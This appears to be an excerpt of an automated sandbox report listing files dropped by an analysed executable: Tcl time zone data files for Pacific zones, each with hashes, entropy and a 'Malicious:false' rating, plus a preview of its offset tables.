                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Funafuti) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):247
                                                                                                                                                                                                                              Entropy (8bit):4.687336389955113
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/fEGDm2OHvQYeoHTie7KVQRncRvinrN5/uFifriX:MB86fhmdH0CTV7OcdrN5/uFiGX
                                                                                                                                                                                                                              MD5:0557D164DCD8DF5D99F7AF5A2AB1AD4F
                                                                                                                                                                                                                              SHA1:68AFD04303E5F541480425405D82E1827F78A8DF
                                                                                                                                                                                                                              SHA-256:192545659F971084ADC8489A2B96A6439FF391599DC962AA13375ACCFB3C09D9
                                                                                                                                                                                                                              SHA-512:1DA004E51F8E7A712EDE920CBB62E81F9F55450FB52B62F78F1CD4F8F4E342B4DAB2C28AA5161E8B24942A7A5BD55F978AFDA1C5E1949241E71D738079DEF9B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Galapagos) {.. {-9223372036854775808 -21504 0 LMT}.. {-1230746496 -18000 0 -05}.. {504939600 -21600 0 -06}.. {722930400 -18000 1 -06}.. {728888400 -21600 0 -06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                              Entropy (8bit):4.976931060677737
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5hBYfMXGm2OHKToxYoHsdNfis:SlSWB9eg/DDm2OHPxYoH4qs
                                                                                                                                                                                                                              MD5:45330CE0FA604304C6ACF8EF8CAF51EC
                                                                                                                                                                                                                              SHA1:20EEF9646996C2EC9B2641EBCCBE4766BF38B17B
                                                                                                                                                                                                                              SHA-256:190E02A0C00D165FA45C73AEF9C0D6C82B1720E7406E5610DD860AED10A021A5
                                                                                                                                                                                                                              SHA-512:51C7931B503405DA0B4078F6BE411895DD00E86AC7C5BE475030664D5302AD614293541DEE7FFC3D86A9DDB1BDA32BCAA746CF1D207DB063FBA2F9E9BE12836C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Gambier) {.. {-9223372036854775808 -32388 0 LMT}.. {-1806678012 -32400 0 -09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):157
                                                                                                                                                                                                                              Entropy (8bit):4.9796189407775255
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5RyJTLJ5FNMXGm2OHddHvpoxYoHsdMWdHPVtyn:SlSWB9eg/LJHjXDm2OHdFGxYoHgHPLy
                                                                                                                                                                                                                              MD5:DF09960360D8CEDCA2A4DC19A177C4A6
                                                                                                                                                                                                                              SHA1:9F73F271B8C85B25FE6392B8BF7465C92EFFE621
                                                                                                                                                                                                                              SHA-256:161762334DFF48B1D58824911E1FF4171386EA18234DD3DD5B0798515593086A
                                                                                                                                                                                                                              SHA-512:1BE9E0F90DA529C99E317F399BFDB913A076651CF8801A1849247B26A350A76D8B5807AB139F3DBB97790DDFC332BDBEB57B364BF67FA2BB440AFEDC4130A648
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guadalcanal) {.. {-9223372036854775808 38388 0 LMT}.. {-1806748788 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):733
                                                                                                                                                                                                                              Entropy (8bit):4.244282318063802
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862mdHanCTCtBCv1yWQkHHLTaWJ+x+87W0x+8+yWSi+JW7+sWU0dwaW1j+FaW2:FeaC2twvY3knLGs+I87p+8d9i+J7s70c
                                                                                                                                                                                                                              MD5:BA319E451BE323C852A8ABFC299DDA28
                                                                                                                                                                                                                              SHA1:FC9314C162FF1FE1ED5E2C5DF962A55D4D6D8115
                                                                                                                                                                                                                              SHA-256:42CB69ABC83415F63CA7D2A3E5314A41817AEE3206ECCC7172C50A74B1597DB0
                                                                                                                                                                                                                              SHA-512:3BF733B9ED2A57B01BE173A8421B2D5A45888A230461EA0BD8C5B4AC7DC010BB527346731196141C70AFECDF88DD47AFE48636243DFC395D88E58231BEDF7D2A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guam) {.. {-9223372036854775808 -51660 0 LMT}.. {-3944626740 34740 0 LMT}.. {-2177487540 36000 0 GST}.. {-885549600 32400 0 +09}.. {-802256400 36000 0 GST}.. {-331891200 39600 1 GDT}.. {-281610000 36000 0 GST}.. {-73728000 39600 1 GDT}.. {-29415540 36000 0 GST}.. {-16704000 39600 1 GDT}.. {-10659600 36000 0 GST}.. {9907200 39600 1 GDT}.. {21394800 36000 0 GST}.. {41356800 39600 1 GDT}.. {52844400 36000 0 GST}.. {124819200 39600 1 GDT}.. {130863600 36000 0 GST}.. {201888000 39600 1 GDT}.. {209487660 36000 0 GST}.. {230659200 39600 1 GDT}.. {241542000 36000 0 GST}.. {977493600 36000 0 ChST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):344
                                                                                                                                                                                                                              Entropy (8bit):4.640604617840767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/PeDDm2OHsVVoHvBrai3UNFv+rUXaWFvAHovj/0nvCv7p+v:MB86WXmdH0VCvBz0GOTA0/0y74v
                                                                                                                                                                                                                              MD5:F3F0E64655FAA79E40860765EEBB5B77
                                                                                                                                                                                                                              SHA1:7F6C2FC100AEABC26B7205AB53C1E016B12E4D60
                                                                                                                                                                                                                              SHA-256:69319015799D32D3CF7C0A3E9991B4B1F3E0C5D1B4FBF400517350CCA9D2C3B7
                                                                                                                                                                                                                              SHA-512:7C9238BCCB13B90D4DC9B5E776C421A42C25D21B4E026406F57FA1E70983E8F6BF1CE927AB9D0D6261C5C1802A8B810399F506915262F82F487417CFD704B2F1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Honolulu) {.. {-9223372036854775808 -37886 0 LMT}.. {-2334101314 -37800 0 HST}.. {-1157283000 -34200 1 HDT}.. {-1155436200 -34200 0 HST}.. {-880201800 -34200 1 HWT}.. {-769395600 -34200 1 HPT}.. {-765376200 -37800 0 HST}.. {-712150200 -36000 0 HST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.844454917943834
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yc6e8SHAIgOb6eKAN/NWyVheo:MByMdniinbtNWzo
                                                                                                                                                                                                                              MD5:4244078A03C2493009EF2F6BDA2F326F
                                                                                                                                                                                                                              SHA1:AC2FF3E91A8831A479B33DF32A0118BC2EB255D0
                                                                                                                                                                                                                              SHA-256:6E52B361AC8A6A578C709F6D58AA7535F06C0CB1707081C2D5A63FA8545D955C
                                                                                                                                                                                                                              SHA-512:398B32E0FAF80E40DF3ACD203DF380D61DC39322F0BA0388A18281BC26973945F45683A104B9A785BB9DF5E514322F6994F934289E4B56B7982F94D4528D4272
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:Pacific/Johnston) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.669308556946547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/KyXDm2OHEMmzQwXy29BVyv7y/fTVVFty:MB86KyTmdHEZzQUBVyDy/fZvty
                                                                                                                                                                                                                              MD5:544A0A83241333805192A6F03888E359
                                                                                                                                                                                                                              SHA1:99D2BE79D57B44BD538386F9E7551C9E1874D7E3
                                                                                                                                                                                                                              SHA-256:0B1345555EC2B4738CC4DEBFE496C287966F238386263032FF1E27912CCBFBA6
                                                                                                                                                                                                                              SHA-512:61C91265632D01FBB7F4C739368756C428258FA6C141E49E88B6C78ABEA6150A74B8DFCF14C5AADDA03C1EA6F04D122734654495C26B8614561786B1C5C7EF10
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kanton) {.. {-9223372036854775808 0 0 -00}.. {-1020470400 -43200 0 -12}.. {307627200 -39600 0 -11}.. {788871600 46800 0 +13}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.739672105601744
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/iSDm2OHjkeoHvmLVFFz4YWXfSzvjNv:MB86iGmdHpCvU4VfSbxv
                                                                                                                                                                                                                              MD5:1B695BBB9C50F6AFC05F67DE30374160
                                                                                                                                                                                                                              SHA1:08AD8BBB6C99EB36FC3E462DB41C6896F52F150C
                                                                                                                                                                                                                              SHA-256:4F7235B956A5A01676BE05275E086D5157EBC24FD91022E87817020669F915F7
                                                                                                                                                                                                                              SHA-512:DC35CB1C2E5E035A82F91D1B1F4B48D7B112D9B7A1A7DB9C4A4C42C4D58002E1ECD9D24B2EA5B624DBB526ADDF9A8AB37D4315843207C34C16B2EFE33A254752
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kiritimati) {.. {-9223372036854775808 -37760 0 LMT}.. {-2177415040 -38400 0 -1040}.. {307622400 -36000 0 -10}.. {788868000 50400 0 +14}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):394
                                                                                                                                                                                                                              Entropy (8bit):4.441317927120857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB869nmdHlCTvrvCvKcHwzHHI/HKOjHHwZaLYkcy:2ecrrqvGznISknwZaLxcy
                                                                                                                                                                                                                              MD5:B489D7BDE8EB805B2A24726A6FB0C441
                                                                                                                                                                                                                              SHA1:7997A33AA56857EC52B1198DBEF4CE1DB50D69FD
                                                                                                                                                                                                                              SHA-256:B528E5E712E5F878603183E7CCFF55E5DB97CB47D7628BCB635342796317B899
                                                                                                                                                                                                                              SHA-512:4898AC2747FB8620BE29933CC7AA344AF1A3B7777D1AFF08BB4C6CE6E7AF205581937CCB488F3CB39CC8CA7FB42EDC8E1CAD8BADC9FCA40E3CAD23271CD66FCB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kosrae) {.. {-9223372036854775808 -47284 0 LMT}.. {-3944631116 39116 0 LMT}.. {-2177491916 39600 0 +11}.. {-1743678000 32400 0 +09}.. {-1606813200 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-770634000 39600 0 +11}.. {-7988400 43200 0 +12}.. {915105600 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):304
                                                                                                                                                                                                                              Entropy (8bit):4.5947337310364835
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/yEyDm2OH4T2eoHvmfKnOjvScHrkL/Xy2185k0YAov:MB86XmmdHWCv6KOjHHgLN8tby
                                                                                                                                                                                                                              MD5:7D1FC9913941693ACBD6A3CCB2F34555
                                                                                                                                                                                                                              SHA1:D07C8AAED1DF9614BCA6EEF0F72FB98BE46CF5EF
                                                                                                                                                                                                                              SHA-256:38133BE70100D7DC244A680827879E6B240646C7C0B68F58652051E681A71985
                                                                                                                                                                                                                              SHA-512:419F0A1D1D71C8F84765C7B54271D7EFD6A81F428751523A214ABB24A8770DD5A7666F634A20AF97D5AAB8F21C0DEF23DCDE068CF4C1CCC7639ABC43864A9DBC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kwajalein) {.. {-9223372036854775808 40160 0 LMT}.. {-2177492960 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-817462800 39600 0 +11}.. {-7988400 -43200 0 -12}.. {745934400 43200 0 +12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.7986219497241995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHznHlUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/QxNn
                                                                                                                                                                                                                              MD5:EB409C340A475B60993965A0E2892B6E
                                                                                                                                                                                                                              SHA1:819881A078F34EF8FC55D71D829B82C56E6723D7
                                                                                                                                                                                                                              SHA-256:935BC00C13863715D09463E54DC2A6FF0F1A7EEA8D5895C87836AA59716CBD57
                                                                                                                                                                                                                              SHA-512:A28AF85022F8B3C2EE5F93BF6FDC0C349B73F25D88BA151ACE424EED1A95FA29608A6B1AD3D5FD952B2FB7F48DF6FDF8E6504F2B53E6782E4FF73335AF9A15C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Majuro) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.976348164850869
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDHzrHeWNMXGm2OHOx5oHsdNpNFvvIVVFvYy:SlSWB9eg/cHeSDm2OHOnoH4/FvQVVFAy
                                                                                                                                                                                                                              MD5:80CB45F42BAB1AA72CD7C7BC394DF3F8
                                                                                                                                                                                                                              SHA1:8B5ED2BCCA1AEB41F22AFD14F46533959828B2BE
                                                                                                                                                                                                                              SHA-256:AE0B5055C6E57516F23749B13681205EAD376E682959716A457B1377AF8160BA
                                                                                                                                                                                                                              SHA-512:71562E340B7A96B91D04FCBCAF71B66EA725CA1BD1094343C4442F8F9A8C67A3BE378034849197407D21C3EE74E2C753B1FD3BAFF2378714B993AD9336236A0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Marquesas) {.. {-9223372036854775808 -33480 0 LMT}.. {-1806676920 -34200 0 -0930}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.81307101485774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/nUDHz0HvUDHurKv:SlSWB9vsM3yciemHAIgObiecN/Zevn
                                                                                                                                                                                                                              MD5:13CE48F8FF74BFCEFCB8D217D6357E38
                                                                                                                                                                                                                              SHA1:296D31E3F868934C6EB34BF1BF4C23F3E1839294
                                                                                                                                                                                                                              SHA-256:F62C6A2DEC1E9EC78115D5F14E5B9DB7C86F788662D2E68F7E6714F4A05DC974
                                                                                                                                                                                                                              SHA-512:778813FC08EF803743F392000BECE73C1C079883DAFC26FAC0AF8FA3FA4AE1D94BA8F3CAA5E82DD4DB1A5F12AD49E123901908F5483E0E325952622AB4C4A26A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:Pacific/Midway) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):244
                                                                                                                                                                                                                              Entropy (8bit):4.702705620563736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/JdDm2OHceoHx6sCH/ZdqvScH9cd0YAov:MB86J5mdH9CMhcHHauby
                                                                                                                                                                                                                              MD5:30A8285FCCE2E98889E53DF60B906C3D
                                                                                                                                                                                                                              SHA1:C7789CB11A2C8FE3861FF3C0A7A41F6CAFD87631
                                                                                                                                                                                                                              SHA-256:22C367F3219B5FC736260D9DBFEF5FCB767F1A6BDA991C9352F790A3D1FFE884
                                                                                                                                                                                                                              SHA-512:02DA82680588839B06F820979AECC78B7FBEAB9D6D49176B513B80F1C8BA2D55FB3674B19EFDD574EE6FC01539EF7C3081A4B34D14A54DACF367D816B62E5843
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Nauru) {.. {-9223372036854775808 40060 0 LMT}.. {-1545131260 41400 0 +1130}.. {-862918200 32400 0 +09}.. {-767350800 41400 0 +1130}.. {287418600 43200 0 +12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.846897598147338
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDHwMQA3WNMXGm2OH0SNoHoRWVGXyOyovFaSUGFAZvBByV:SlSWB9eg/Jm3SDm2OHJoHFGXCodZUGFd
                                                                                                                                                                                                                              MD5:6E8EC957423917AE7A7EF503661C1A77
                                                                                                                                                                                                                              SHA1:B4FA3C3E3F96C28B7DB87BFD441D2EE99CC81B6F
                                                                                                                                                                                                                              SHA-256:869CCA656BE88E4E7481C75737C3656BAB6924AD1751505815AC719C59269842
                                                                                                                                                                                                                              SHA-512:9047ABE673259699C7A548BC7B5636DD646DD382C751B796522F65404162AB1B0BB022FD274653921E5B23C847EE248AEF6749E15ED2CFC1DCE35BBA294D8251
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Niue) {.. {-9223372036854775808 -40780 0 LMT}.. {-543069620 -40800 0 -1120}.. {-173623200 -39600 0 -11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5139
                                                                                                                                                                                                                              Entropy (8bit):3.65794255179185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:K/yg8hZbeS07HbbYTqge+gDrWnAxhejtB0e+Pwn1UVimqNQrKvyXrStkCDv:K/y7hNeS07sq0Erk10lINQrKvyXrwv
                                                                                                                                                                                                                              MD5:E19700A894AA64715D14F501D8D2FA98
                                                                                                                                                                                                                              SHA1:57CFC96E2EBB985720DB290F59181860AF2AC1AA
                                                                                                                                                                                                                              SHA-256:5D16C3EF1DB996C1B8E33AD884C33946F77DA872F35F41EC3BD5B288F43CC9AF
                                                                                                                                                                                                                              SHA-512:E11EAF2A7B217CDBEECB57635184F04171F0DB088FCC4702AA8D40A3A5453904592F5869849913E2EB02DC5941C84203A76D270E8930B0B691A3B9C39B78BF30
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Norfolk) {.. {-9223372036854775808 40312 0 LMT}.. {-2177493112 40320 0 +1112}.. {-599656320 41400 0 +1130}.. {152029800 45000 1 +1230}.. {162916200 41400 0 +1130}.. {1443882600 39600 0 +11}.. {1561899600 39600 0 +12}.. {1570287600 43200 1 +12}.. {1586012400 39600 0 +12}.. {1601737200 43200 1 +12}.. {1617462000 39600 0 +12}.. {1633186800 43200 1 +12}.. {1648911600 39600 0 +12}.. {1664636400 43200 1 +12}.. {1680361200 39600 0 +12}.. {1696086000 43200 1 +12}.. {1712415600 39600 0 +12}.. {1728140400 43200 1 +12}.. {1743865200 39600 0 +12}.. {1759590000 43200 1 +12}.. {1775314800 39600 0 +12}.. {1791039600 43200 1 +12}.. {1806764400 39600 0 +12}.. {1822489200 43200 1 +12}.. {1838214000 39600 0 +12}.. {1853938800 43200 1 +12}.. {1869663600 39600 0 +12}.. {1885993200 43200 1 +12}.. {1901718000 39600 0 +12}.. {1917442800 43200 1 +12}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):326
                                                                                                                                                                                                                              Entropy (8bit):4.531117764974758
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/JcSDm2OHTYoHgnX2czO/FxgV62JFy:MB86JcGmdHTYCgX2czUjgM2ny
                                                                                                                                                                                                                              MD5:2F1E92A11DF44C72DC305C13111DEA35
                                                                                                                                                                                                                              SHA1:847F551C3D6C75CD2D0D6D87FCF3294CA8DD90B2
                                                                                                                                                                                                                              SHA-256:238683C027D2319C33D975A837E9FC9D24DD53B1A67108EDBF7ABDF0DB050881
                                                                                                                                                                                                                              SHA-512:E35D8C71AFDBB9A7507E873925001AEDE3734B1D235F509D19952E85279CBCC233A73412EA1F79CB534A45D36FEAA8AFDA98D9964DC93C7892B318F4AFC9A076
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Noumea) {.. {-9223372036854775808 39948 0 LMT}.. {-1829387148 39600 0 +11}.. {250002000 43200 1 +11}.. {257342400 39600 0 +11}.. {281451600 43200 1 +11}.. {288878400 39600 0 +11}.. {849366000 43200 1 +11}.. {857228400 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.985607855830399
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDHurKeTFfXMXGm2OH2ivkeoHvUPi1TsYoHsdfWTVvvVFv:SlSWB9eg/XecDm2OH23eoHvWieYoHiWB
                                                                                                                                                                                                                              MD5:E86D90DAA694B0EAC42F8C01346BC95B
                                                                                                                                                                                                                              SHA1:CD29DEFC291C939296E86DC7EF5D0654D85285E8
                                                                                                                                                                                                                              SHA-256:CCA96640AB3BC707224FA86D9AF66F9D53A204A97B370B2785BA8208688BF8B6
                                                                                                                                                                                                                              SHA-512:937BA420061E3781F831779B458E914A0FC465C4B41796F8B7CB1E548822F5777A6450FC6002AB13EBC5C9F54E374D3ED731D05B2B302B95359BE34094E5062B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Pago_Pago) {.. {-9223372036854775808 45432 0 LMT}.. {-2445424632 -40968 0 LMT}.. {-1861879032 -39600 0 SST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.919381181565273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDHugEZF3fMXGm2OHKvkeoHucRbgnJnoHvmdQ4+vScFAy:SlSWB9eg/Xg2PDm2OHK8eoHTWJnoHvmi
                                                                                                                                                                                                                              MD5:2E6C7EC61C7E29A147475C223B163F6B
                                                                                                                                                                                                                              SHA1:3A98D3441335224E7EBC0648990BCA1DE3BDF5C6
                                                                                                                                                                                                                              SHA-256:97DE6C2C717BFEAD00F83B5D39D654C32CEE580226F5F084484EBAD57BBCE7FF
                                                                                                                                                                                                                              SHA-512:5868C43966DDEBA8EC4BBBB29CDFDDFF0C7B01FD4D579FF655F3363029059F969B39C9221190672B6A2F7938583594AA0B103FC2A7ED573E2BC1C3A1623DE8DD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Palau) {.. {-9223372036854775808 -54124 0 LMT}.. {-3944624276 32276 0 LMT}.. {-2177485076 32400 0 +09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
